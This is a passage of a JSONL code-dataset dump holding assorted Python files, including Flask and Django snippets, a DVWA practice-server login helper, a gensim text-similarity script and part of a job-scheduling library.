parameter $\\lambda_{%.s}$'%(Methods[0]), c='r')\n\n ay_k_t.spines['top'].set_color('red')\n ay_k_t.spines['right'].set_color('red')\n ay_k_t.xaxis.label.set_color('red')\n ay_k_t.tick_params(axis='x', colors='red', which='both')\n ay_k.yaxis.label.set_color('red')\n ay_k.tick_params(axis='y', colors='red', which='both')\n plt.tight_layout()\n","sub_path":"functions/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"57484872","text":"from flask import Flask, render_template\n\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\nport = 5000\nhost = '0.0.0.0'\n\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n app.run(host=host, port=port)\n","sub_path":"mock_fe/mock_fe.py","file_name":"mock_fe.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"372984073","text":"# -*- coding: utf-8 -*-\n\nKEY_NM_EVT = \"evt\"\nKEY_NM_MSG = \"msg\"\nKEY_NM_DATE = \"date\"\nKEY_NM_DATA = \"data\"\n\nEVT_TYPE_FIN = 0\nEVT_TYPE_ERR = 1\nEVT_TYPE_GET_KP200_FUT = 2\n\nHOST = \"127.0.0.1\"\nPORT = 8765\n","sub_path":"Study And Project/DAT-I LAB Study and Project/creon dat/global_def.py","file_name":"global_def.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"41168086","text":"suma_total = float(0)\nbandera = True\nprint(\"Ingrese las notas de los estudiantes de su materia\")\nwhile (bandera):\n calificacion = float(input(\"Ingrese calificacion: \"))\n suma_total = suma_total + calificacion\n temporal = input(\"Ingrese 'Si' para salir del ciclo: \")\n if temporal == \"Si\":\n bandera = False\nprint(\"Suma de calificaiones es %.2f\\n\"%(suma_total))","sub_path":"semana 6/ejercicios-clase-06-1bim-JamilErasmo/ejemplos-while/Ejemplo08.py","file_name":"Ejemplo08.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"443681606","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom .forms import PostForm\n\n@app.route('/')\n@app.route('/index')\ndef index():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(body=form.post.data)\n return render_template('index.html',\n title='Home',\n form=form)\n","sub_path":"math_app/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"647853000","text":"from django import template\n\nfrom contents.models import ContentBlock\n\n\nregister = template.Library()\n\n@register.simple_tag\ndef content_block(name):\n\n try:\n content_block = ContentBlock.objects.get(name=name)\n except ContentBlock.DoesNotExist:\n return \"\"\n\n return content_block.content.rendered\n\nregister.simple_tag(content_block)","sub_path":"web/contents/templatetags/content_block.py","file_name":"content_block.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"262133661","text":"from flask import request\n\nfrom core.resource_core import BaseResource\nfrom schemas.user import User as SchemaUser\nfrom schemas.user import UserLevel as SchemaUserLevel\nfrom 
schemas.user import UserStatus as SchemaUserStatus\n\nclass User(BaseResource):\n\theader = {'Allow' : 'GET, POST, PUT, PATCH, PARTIAL_DELETE, DELETE'}\n\n\tdef user_r(self):\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUser.get()\n\t\t\t\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUser()\n\t\t\targs = dict(request.args.copy())\n\t\t\targs['user_status_id'] = 1\n\t\t\targs['user_level_id'] = 2\n\t\t\tresponse, code = user.post(args)\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.patch()\n\n\t\telif request.method == 'PARTIAL_DELETE':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.partial_delete('user_status_id')\n\n\t\telif request.method == 'DELETE':\n\t\t\tuser = SchemaUser()\n\t\t\tresponse, code = user.delete()\n\n\t\treturn self.make_response(response, code, self.header)\n\n\tuser_r.methods = ['GET', 'POST', 'PUT', 'PATCH', 'PARTIAL_DELETE', 'DELETE']\n\nclass UsersLevel(BaseResource):\n\tdef user_level_r(self):\n\t\theader = {'Allow' : 'GET, POST, PUT, PATCH'}\n\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUserLevel.get()\n\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.post()\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUserLevel()\n\t\t\tresponse, code = user.patch()\n\n\t\treturn self.make_response(response, code, header)\n\n\tuser_level_r.methods = ['GET', 'POST', 'PUT', 'PATCH']\n\nclass UsersStatus(BaseResource):\n\tdef user_status_r(self):\n\t\theader = {'Allow' : 'GET, POST, PUT, PATCH'}\n\n\t\tif request.method == 'GET':\n\t\t\tresponse, code = SchemaUserStatus.get()\n\n\t\telif request.method == 'POST':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.post()\n\n\t\telif request.method == 'PUT':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.put()\n\n\t\telif request.method == 'PATCH':\n\t\t\tuser = SchemaUserStatus()\n\t\t\tresponse, code = user.patch()\n\n\t\treturn self.make_response(response, code, header)\n\n\tuser_status_r.methods = ['GET', 'POST', 'PUT', 'PATCH']","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"504923355","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom mkbroapp.views import index, devpage, about, contacts\n\nurlpatterns = [\n # Examples:\n # url(r'^$', 'mkbroproject.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', index),\n url(r'^devpage$', devpage),\n url(r'^about$', about),\n url(r'^contacts$', contacts),\n]\n","sub_path":"django/mkbroproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"565626515","text":"from bs4 import BeautifulSoup\nfrom requests.compat import urljoin\nimport sys, requests\n\nclass Session:\n def __init__(self, base_url):\n self.__session = requests\n self.__base_url = base_url\n self.__csrf = None\n self.__cookies = {\n 'PHPSESSID': None,\n 'security': None\n }\n\n def get_session(self):\n return self.__session\n\n def 
get_base_url(self):\n        return self.__base_url\n\n    def get_csrf(self):\n        return self.__csrf\n\n    def get_cookies(self):\n        return self.__cookies\n\n    def get_sess_infos(self, rel_url, cookie=None):\n        if cookie is None:\n            cookie = self.__cookies\n        # Prepare the GET request: join the base URL and the relative path\n        req_url = urljoin(self.__base_url, rel_url)\n\n        #Fetch CSRF token & cookies\n        try:\n            # Send the GET request\n            r = self.__session.get(req_url, cookies=cookie)\n            # Fetch CSRF token using CSS selector (google chrome: inspect element)\n            self.__csrf = BeautifulSoup(r.text, 'html.parser').find(\"input\", attrs={\"name\":\"user_token\"})[\"value\"]\n            # Fetch cookies (PHPSESSID & Security Level)\n            self.__cookies.update(r.cookies.get_dict())\n            return self.__csrf, self.__cookies\n        except:\n            print('Could not connect to DVWA server. Are you sure it is the right URL?')\n            sys.exit(-1)\n\n    # Log in + fetch CSRF token & cookies\n    def login(self, rel_url, login_user, login_pass):\n        # GET request to fetch CSRF token and cookies\n        self.get_sess_infos(rel_url)\n\n        data = {\n            'username': login_user,\n            'password': login_pass,\n            'Login': 'Login',\n            'user_token': self.__csrf\n        }\n\n        # Login attempt\n        try:\n            login_url = urljoin(self.__base_url, rel_url)\n            r = self.__session.post(url=login_url, data=data, cookies=self.__cookies)\n        except:\n            print('Login attempt has failed.')\n            sys.exit(-1)\n\n        if r.status_code != 200:\n            print('DVWA server did not return expected status code. CODE: %d' % r.status_code)\n            sys.exit(-1)\n\n        return r.text\n","sub_path":"core/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"418692029","text":"\"\"\"\nPython job scheduling for humans.\n\nAn in-process scheduler for periodic jobs that uses the builder pattern\nfor configuration. Schedule lets you run Python functions (or any other\ncallable) periodically at pre-determined intervals using a simple,\nhuman-friendly syntax.\n\nInspired by Addam Wiggins' article \"Rethinking Cron\" [1] and the\n\"clockwork\" Ruby module [2][3].\n\nFeatures:\n    - A simple to use API for scheduling jobs.\n    - Very lightweight and no external dependencies.\n    - Excellent test coverage.\n    - Works with Python 2.7 and 3.3\n\nUsage:\n    >>> import schedule\n    >>> import time\n\n    >>> def job(message='stuff'):\n    >>>     print(\"I'm working on:\", message)\n\n    >>> schedule.every(10).minutes.do(job)\n    >>> schedule.every().hour.do(job, message='things')\n    >>> schedule.every().day.at(\"10:30\").do(job)\n\n    >>> while True:\n    >>>     schedule.run_pending()\n    >>>     time.sleep(1)\n\n[1] http://adam.heroku.com/past/2010/4/13/rethinking_cron/\n[2] https://github.com/tomykaira/clockwork\n[3] http://adam.heroku.com/past/2010/6/30/replace_cron_with_clockwork/\n\"\"\"\nimport datetime\nimport functools\nimport logging\nimport random\nimport time\nfrom dateutil import parser\nfrom dateutil.tz import tzlocal\n\nfrom .tz import tz_offsets\n\nlogger = logging.getLogger('schedule')\n\n\nclass Scheduler(object):\n    def __init__(self):\n        self.jobs = []\n\n    def run_pending(self):\n        \"\"\"Run all jobs that are scheduled to run.\n\n        Please note that it is *intended behavior that run_pending() does not\n        run missed jobs*. 
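A job that comes due fires once per call; missed intervals are skipped outright rather than queued. 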
For example, if you've registered a job that\n        should run every minute and you only call run_pending() in one hour\n        increments then your job won't be run 60 times in between but\n        only once.\n        \"\"\"\n        runnable_jobs = (job for job in self.jobs if job.should_run)\n        for job in sorted(runnable_jobs):\n            job.run()\n\n    def run_all(self, delay_seconds=0):\n        \"\"\"Run all jobs regardless of whether they are scheduled to run or not.\n\n        A delay of `delay` seconds is added between each job. This helps\n        distribute system load generated by the jobs more evenly\n        over time.\"\"\"\n        logger.info('Running *all* %i jobs with %is delay in between',\n                    len(self.jobs), delay_seconds)\n        for job in self.jobs:\n            job.run()\n            time.sleep(delay_seconds)\n\n    def clear(self):\n        \"\"\"Deletes all scheduled jobs.\"\"\"\n        del self.jobs[:]\n\n    def every(self, interval=1):\n        \"\"\"Schedule a new periodic job.\"\"\"\n        job = Job(interval)\n        self.jobs.append(job)\n        return job\n\n    def on(self, *days):\n        \"\"\"Schedule a new job to run on specific weekdays.\n\n        See the docstring for `Job.on()`.\n        \"\"\"\n        job = self.every()\n        job.unit = 'days'\n        return job.on(*days)\n\n    @property\n    def next_run(self):\n        \"\"\"Datetime when the next job should run.\"\"\"\n        if not self.jobs:\n            return None\n        return min(self.jobs).next_run\n\n    @property\n    def idle_seconds(self):\n        \"\"\"Number of seconds until `next_run`.\"\"\"\n        return (self.next_run - datetime.datetime.now(tzlocal())\n                ).total_seconds()\n\n\nclass Job(object):\n    \"\"\"A periodic job as used by `Scheduler`.\"\"\"\n    WEEKDAYS = {'sunday': 0, 'monday': 1, 'tuesday': 2, 'wednesday': 3,\n                'thursday': 4, 'friday': 5, 'saturday': 6}\n\n    def __init__(self, interval):\n        self.interval = interval  # pause interval * unit between runs\n        self.job_func = None  # the job_func to run\n        self.unit = None  # time units, e.g. 
'minutes', 'hours', ...\n self.at_time = None # optional time at which this job runs\n self.between_times = ()\n self.run_days = []\n self.start_run = None # datetime after which this job will start\n self.last_run = None # datetime of the last run\n self.next_run = None # datetime of the next run\n self.period = None # timedelta between runs, only valid for\n\n def __lt__(self, other):\n \"\"\"PeriodicJobs are sortable based on the scheduled time\n they run next.\"\"\"\n return self.next_run < other.next_run\n\n def __repr__(self):\n fmt_dt = \"%Y-%m-%d %H:%M:%S %Z\"\n fmt_t = \"%H:%M:%S %Z\"\n\n def format_time(t):\n return t.strftime(fmt_dt) if t else '[never]'\n\n timestats = '(last run: %s, next run: %s)' % (\n format_time(self.last_run), format_time(self.next_run))\n\n job_func_name = self.job_func.__name__\n args = [repr(x) for x in self.job_func.args]\n kwargs = ['%s=%s' % (k, repr(v))\n for k, v in self.job_func.keywords.items()]\n call_repr = job_func_name + '(' + ', '.join(args + kwargs) + ')'\n\n if self.run_days:\n final_days = []\n for day in self.run_days:\n days_str = [k.title() for k, i in Job.WEEKDAYS.items()\n for d in day if i == d]\n final_days.append(' or '.join(days_str))\n repr_str = 'Every %s' % ' and '.join(final_days)\n else:\n repr_str = 'Every %s %s' % (\n self.interval,\n self.unit[:-1] if self.interval == 1 else self.unit)\n\n if self.between_times:\n repr_str += ' between %s' % ' and '.join(\n t.strftime(fmt_t).strip()\n for t in self.between_times)\n elif self.at_time:\n repr_str += ' at %s' % self.at_time.strftime(fmt_t).strip()\n if self.start_run:\n repr_str += ' starting %s' % self.start_run.strftime(fmt_dt)\n repr_str += ' do %s %s' % (call_repr, timestats)\n return repr_str\n\n @property\n def second(self):\n assert self.interval == 1\n return self.seconds\n\n @property\n def seconds(self):\n self.unit = 'seconds'\n return self\n\n @property\n def minute(self):\n assert self.interval == 1\n return self.minutes\n\n @property\n def minutes(self):\n self.unit = 'minutes'\n return self\n\n @property\n def hour(self):\n assert self.interval == 1\n return self.hours\n\n @property\n def hours(self):\n self.unit = 'hours'\n return self\n\n @property\n def day(self):\n assert self.interval == 1\n return self.days\n\n @property\n def days(self):\n self.unit = 'days'\n return self\n\n @property\n def week(self):\n assert self.interval == 1\n return self.weeks\n\n @property\n def weeks(self):\n self.unit = 'weeks'\n return self\n\n def on(self, *days):\n \"\"\"Schedule the job to run on specific weekdays.\n\n `days` can be a string (or sequence of strings) with the name of the\n weekday (case insensitive), e.g. 'Monday', 'sunday', etc, or a starting\n substring of the name of the weekday, e.g. 'tue', 'Sat', etc.\n\n If you specify multiple days, e.g. ('mon', 'wed'), the job will run\n every Monday and Wednesday.\n\n You can also specify OR conditions by separating the day names with a\n pipe, e.g. ('sun|mon', 'wed|thu'). 
In this case the job will run\n every Sunday *or* Monday, and every Wednesday *or* Thursday.\n \"\"\"\n weeknums = []\n for day in days:\n day_or = set()\n for d in day.split('|'):\n for n, i in Job.WEEKDAYS.items():\n if n.startswith(d.lower()):\n day_or.add(i)\n if day_or:\n weeknums.append(day_or)\n\n self.run_days = weeknums\n return self\n\n def at(self, time_str):\n \"\"\"Schedule the job every day at a specific time.\n\n Calling this is only valid for jobs scheduled to run every\n N day(s).\n \"\"\"\n assert self.unit == 'days'\n self.at_time = parser.parse(time_str, tzinfos=tz_offsets)\n if not self.at_time.tzinfo:\n self.at_time = self.at_time.replace(tzinfo=tzlocal())\n return self\n\n def between(self, time_str):\n \"\"\"Schedule the job at a random time between two timestamps.\"\"\"\n times = []\n for t in time_str.split('-'):\n dt = parser.parse(t, tzinfos=tz_offsets)\n if not dt.tzinfo:\n dt = dt.replace(tzinfo=tzlocal())\n times.append(dt)\n self.between_times = tuple(times)\n return self\n\n def starting(self, date_str):\n self.start_run = parser.parse(date_str, tzinfos=tz_offsets)\n if not self.start_run.tzinfo:\n self.start_run = self.start_run.replace(tzinfo=tzlocal())\n return self\n\n def do(self, job_func, *args, **kwargs):\n \"\"\"Specifies the job_func that should be called every time the\n job runs.\n\n Any additional arguments are passed on to job_func when\n the job runs.\n \"\"\"\n self.job_func = functools.partial(job_func, *args, **kwargs)\n functools.update_wrapper(self.job_func, job_func)\n self._schedule_next_run()\n return self\n\n @property\n def should_run(self):\n \"\"\"True if the job should be run now.\"\"\"\n return datetime.datetime.now(tzlocal()) >= self.next_run\n\n def run(self):\n \"\"\"Run the job and immediately reschedule it.\"\"\"\n logger.info('Running job %s', self)\n self.job_func()\n self.last_run = datetime.datetime.now(tzlocal())\n self._schedule_next_run()\n\n def _schedule_next_run(self):\n \"\"\"Compute the instant when this job should run next.\"\"\"\n # Allow *, ** magic temporarily:\n # pylint: disable=W0142\n assert self.unit in ('seconds', 'minutes', 'hours', 'days', 'weeks')\n starting = self.start_run or datetime.datetime.now(tzlocal())\n\n self.period = datetime.timedelta(**{self.unit: self.interval})\n self.next_run = starting + self.period\n\n if self.run_days:\n run_days = self.run_days[:]\n if self.last_run:\n starting = self.last_run\n # Don't consider this day group if it has been run already\n for day in self.run_days:\n if self.last_run.isoweekday() in day:\n run_days.remove(day)\n\n days = set()\n for day in run_days:\n days.add(random.sample(day, 1)[0])\n\n if not days:\n days_delta = 0\n else:\n # Calculate the closest day from the starting date\n delta_all = sorted([(i - starting.isoweekday()) % 7\n for i in days])\n days_delta = delta_all[0]\n\n if (days_delta == 0 and self.last_run and\n self.last_run.date() == starting.date()):\n # Make sure the job doesn't run today twice\n if self.unit == 'days':\n days_delta = 7\n elif self.unit == 'weeks':\n days_delta = self.interval * 7\n self.next_run = starting + datetime.timedelta(days=days_delta)\n\n if self.between_times:\n start, end = self.between_times\n # Choose a random time between both timestamps\n self.at_time = (start + datetime.timedelta(\n seconds=random.randint(0, int(\n (end - start).total_seconds()))))\n if self.at_time:\n self.next_run = self.next_run.replace(hour=self.at_time.hour,\n minute=self.at_time.minute,\n second=self.at_time.second,\n 
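# note: microseconds are zeroed so the run lands exactly on the configured second\n                                          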
microsecond=0,\n tzinfo=self.at_time.tzinfo)\n # If we are running for the first time, make sure we run\n # at the specified time *today* as well\n if (not self.last_run and not self.run_days and\n self.at_time > datetime.datetime.now(tzlocal())):\n self.next_run = self.next_run - datetime.timedelta(days=1)\n\n logger.info('Scheduled job %s', self)\n\n\n# The following methods are shortcuts for not having to\n# create a Scheduler instance:\n\ndefault_scheduler = Scheduler()\njobs = default_scheduler.jobs # todo: should this be a copy, e.g. jobs()?\n\n\ndef every(interval=1):\n \"\"\"Schedule a new periodic job.\"\"\"\n return default_scheduler.every(interval)\n\n\ndef on(*days):\n \"\"\"Schedule a new job to run on specific weekdays.\n\n See the docstring for `Job.on()`.\n \"\"\"\n return default_scheduler.on(*days)\n\n\ndef run_pending():\n \"\"\"Run all jobs that are scheduled to run.\n\n Please note that it is *intended behavior that run_pending()\n does not run missed jobs*. For example, if you've registered a job\n that should run every minute and you only call run_pending()\n in one hour increments then your job won't be run 60 times in\n between but only once.\n \"\"\"\n default_scheduler.run_pending()\n\n\ndef run_all(delay_seconds=0):\n \"\"\"Run all jobs regardless if they are scheduled to run or not.\n\n A delay of `delay` seconds is added between each job. This can help\n to distribute the system load generated by the jobs more evenly over\n time.\"\"\"\n default_scheduler.run_all(delay_seconds=delay_seconds)\n\n\ndef clear():\n \"\"\"Deletes all scheduled jobs.\"\"\"\n default_scheduler.clear()\n\n\ndef next_run():\n \"\"\"Datetime when the next job should run.\"\"\"\n return default_scheduler.next_run\n\n\ndef idle_seconds():\n \"\"\"Number of seconds until `next_run`.\"\"\"\n return default_scheduler.idle_seconds\n","sub_path":"schedule/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"559652797","text":"'''\nstr='zhanghuandepython'\nprint(str)\nprint(str[0:-1])\nprint(str*2)\nprint(str + 'hello')\nprint('hello\\nbean')\nprint(r'hello\\nbean')\n#似乎python里空格不影响程序的阅读,和编译\n\nx=\"a\"\ny=\"b\"\nprint(x)\nprint(y)\nprint('-------------')\nprint(x,end=\" \")\nprint(y)\n\ncounter = 100 #整型变量\nmiles = 1000.0 #浮点型变量\nname = \"number\" #字符串\nprint(counter)\nprint(miles)\nprint(name)\n\n#python允许你同时为多个变量赋值\n#a=b=c=1\n#可以为多个变量指定多个值\na,b,c=1,2,\"bean\"\nprint(a,b,c)\n#a=1,b=2,c=bean\n\na,b,c,d=20,5.5,True,4+3j\nprint(type(a),type(b),type(c),type(d))\n\na=111\nprint(isinstance(a,int))\n#单纯的使用isinstance不会输出,但使用python环境直接就可以使用isinstance输出\nimport math\nimport numpy\ndef quad(a,b,c):\n drt=(numpy.square(b)-4*a*c)\n if(drt==0):\n x=-b/(2*a)\n return x\n elif(drt>0):\n x1=-(b+math.sqrt(drt))/(2*a)\n x2=-(b-math.sqrt(drt))/(2*a)\n return x1,x2\n else:\n print('无解')\n\ndef person(name,age,**key):\n if 'city' in key:\n pass\n if 'job' in key:\n pass\n print('name:',name,'age:',age,key)\nperson('jack',24,city='beijing',addr='chaoyang',zipcode=12345)\n\ndef product(x, *number):\n for n in number:\n x = x*n\n return x\nprint(product(5,6))\n'''\nimport docx\nimport jieba\nfrom gensim import corpora,models,similarities\n\nfile=docx.Document(\"C:\\\\Users\\\\zh\\\\Desktop\\\\1.docx\")\ndoc_test=docx.Document(\"C:\\\\Users\\\\zh\\\\Desktop\\\\2.docx\")\n'''用来比较的文档'''\n\nall_doc=[]\nall_doc2=[]\nfor i in 
file.paragraphs:\n\tall_doc.append(i.text)  # each paragraph object carries the text; the paragraphs list itself has no .text\n\nfor j in doc_test.paragraphs:\n\tall_doc2.append(j.text)\n\nall_doc_list=[]\nfor doc in all_doc:\n\tdoc_list=[word for word in jieba.cut(doc)]\n\tall_doc_list.append(doc_list)\n\nall_doc_test=[]\nfor doc2 in all_doc2:\n\tdoc_list2=[word for word in jieba.cut(doc2)]\n\tall_doc_test.append(doc_list2)\n\ndictionary = corpora.Dictionary(all_doc_list)\ndictionary.keys()\ndictionary.token2id\ncorpus = [dictionary.doc2bow(doc) for doc in all_doc_list]\n\n\n'''Convert the test document into a single bag-of-words vector'''\ndoc_test_vec = dictionary.doc2bow([word for doc in all_doc_test for word in doc])  # doc2bow expects a flat token list, not a list of lists\n\n'''Build the TF-IDF model'''\ntfidf=models.TfidfModel(corpus)\ntfidf[doc_test_vec]\n\n'''Score similarity'''\nindex = similarities.SparseMatrixSimilarity(tfidf[corpus],num_features=len(dictionary.keys()))\nsim = index[tfidf[doc_test_vec]]\nsorted(enumerate(sim), key=lambda item: -item[1])
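\n\n# Editor's addition (assumption: the script is run ad hoc for a quick report): print the\n# ranking, since the bare sorted(...) expression above discards its result.\nprint(sorted(enumerate(sim), key=lambda item: -item[1])[:5])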
","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"375436782","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTencentBlueKing is pleased to support the open source community by making 蓝鲸智云-权限中心(BlueKing-IAM) available.\nCopyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.\nLicensed under the MIT License (the \"License\"); you may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://opensource.org/licenses/MIT\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on\nan \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n\"\"\"\nimport logging\nfrom typing import Any, MutableMapping, Union\n\nfrom rest_framework import serializers\nfrom rest_framework.serializers import empty\n\nfrom backend.apps.policy.serializers import AttributeSLZ\n\nlogger = logging.getLogger(__name__)\n\n\nclass ASInstanceSLZ(serializers.Serializer):\n    \"\"\"\n    Resource instance requested by an integrated system\n    \"\"\"\n\n    system = serializers.CharField(label=\"System ID\", default=\"\", allow_blank=True, required=False)\n    type = serializers.CharField(label=\"Resource type\")\n    id = serializers.CharField(label=\"Resource ID\")\n\n\nclass ASResourceTypeSLZ(serializers.Serializer):\n    \"\"\"\n    Resource type of an action requested by an integrated system\n    \"\"\"\n\n    system = serializers.CharField(label=\"System ID\")\n    type = serializers.CharField(label=\"Resource type\")\n    instances = serializers.ListField(\n        label=\"Resource topology\",\n        child=serializers.ListField(child=ASInstanceSLZ(label=\"Resource instance\"), allow_empty=False),\n        allow_empty=True,\n        default=list,\n    )\n    attributes = serializers.ListField(\n        label=\"Attributes\", default=list, required=False, child=AttributeSLZ(label=\"Attribute\"), allow_empty=True\n    )\n\n\nclass ASActionSLZ(serializers.Serializer):\n    \"\"\"\n    Action requested by an integrated system\n    \"\"\"\n\n    id = serializers.CharField(label=\"Action ID\")\n    related_resource_types = serializers.ListField(\n        label=\"Related resource types\", child=ASResourceTypeSLZ(label=\"Resource type\"), allow_empty=True, default=list\n    )\n\n\nclass AccessSystemApplicationSLZ(serializers.Serializer):\n    \"\"\"\n    Permission application submitted by an integrated system\n    \"\"\"\n\n    system = serializers.CharField(label=\"System ID\")\n    actions = serializers.ListField(label=\"Requested actions\", child=ASActionSLZ(label=\"Action\"), allow_empty=False)\n\n    @staticmethod\n    def _convert_system(data: MutableMapping[str, Any]):\n        \"\"\"Accept both system and system_id keys in the data\"\"\"\n        if \"system\" not in data and \"system_id\" in data:\n            data[\"system\"] = data[\"system_id\"]\n\n    def __init__(self, instance=None, data: Union[empty, MutableMapping] = empty, **kwargs):\n        # Accept both system and system_id from callers: the legacy protocol used system_id,\n        # while the new protocol standardizes on system\n        if data is not empty:\n            try:\n                self._convert_system(data)\n                for action in data.get(\"actions\", []):\n                    for rrt in action.get(\"related_resource_types\", []):\n                        self._convert_system(rrt)\n                        for rrt_instance in rrt.get(\"instances\", []):\n                            for node in rrt_instance:\n                                self._convert_system(node)\n            except Exception as error:  # pylint: disable=broad-except\n                logger.info(f\"failed to convert system data while serializing an access system application: {error}\")\n\n        super().__init__(instance, data, **kwargs)\n\n    def validate(self, data):\n        action_ids = {action[\"id\"] for action in data[\"actions\"]}\n        if len(data[\"actions\"]) != len(action_ids):\n            raise serializers.ValidationError(\"actions must not repeat\")\n        return data\n\n\nclass AccessSystemApplicationUrlSLZ(serializers.Serializer):\n    url = serializers.URLField()\n","sub_path":"saas/backend/api/application/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"64681921","text":"__author__='Joe_Fan'\n\nimport os\n\ndef sanitize(time_string):\n    if '-' in time_string:\n        splitter = '-'\n    elif ':' in time_string:\n        splitter = ':'\n    else:\n        return(time_string)\n\n    (mins, secs) = time_string.split(splitter)\n    return (mins + '.' + secs)\n\ntry:\n    with open('james.txt', 'r') as jaf:\n        data = jaf.readline()\n    james = data.strip().split(',')\n\n    with open('julie.txt') as juf:\n        data = juf.readline()\n        julie = data.strip().split(',')\n\n    with open(\"mikey.txt\") as mif:\n        data = mif.readline()\n        mikey = data.strip().split(',')\n\n    with open(\"sarah.txt\") as saf:\n        data = saf.readline()\n        sarah = data.strip().split(',')\nexcept IOError as e:\n    raise e\n\njames_clean =[]\njulie_clean =[]\nmikey_clean =[]\nsarah_clean =[]\n\nfor each_item in james:\n    james_clean.append(sanitize(each_item))\nfor each_item in julie:\n    julie_clean.append(sanitize(each_item))\nfor each_item in mikey:\n    mikey_clean.append(sanitize(each_item))\nfor each_item in sarah:\n    sarah_clean.append(sanitize(each_item))\n\nprint(sorted(james_clean))\nprint(sorted(julie_clean))\nprint(sorted(mikey_clean))\nprint(sorted(sarah_clean))","sub_path":"ch5/ch5_p149.py","file_name":"ch5_p149.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"230467441","text":"from google.appengine.ext import db\r\n\r\nfrom datetime import datetime, timedelta\r\nimport logging\r\nimport math\r\nimport reqfilter\r\nimport mixins\r\n\r\nimport calc\r\n\r\nhrsDay = 24\r\nhrsWeek = 7*hrsDay\r\nhrsYear = 365*hrsDay+6\r\nhrsMonth = hrsYear/12\r\n\r\n# Scores are based on hours since 1/1/2000\r\ndtBase = datetime(2000,1,1)\r\n\r\ndef scorable(half_lives=None):\r\n    \"\"\"\r\n    Class decorator to make a db.Model class scorable.\r\n    \r\n    Usage:\r\n    \r\n    @scorable([half_lives])\r\n    class MyModel(db.Model)\r\n        ...\r\n    \r\n    If using python 2.5:\r\n    \r\n    class MyModel(db.Model)\r\n        ...\r\n    \r\n    MyModel = scorable([half_lives])(MyModel)\r\n    \r\n    The following methods will be added to the class:\r\n    \r\n    update_scores(value, [datetime])\r\n    order_by_score(query, half_life)\r\n    set_timescore_results(results, half_life, [datetime])\r\n    score_now(half_life, [datetime], [increment])\r\n    named_scores([datetime])\r\n    \r\n    The following attributes will be added to the class:\r\n    \r\n    
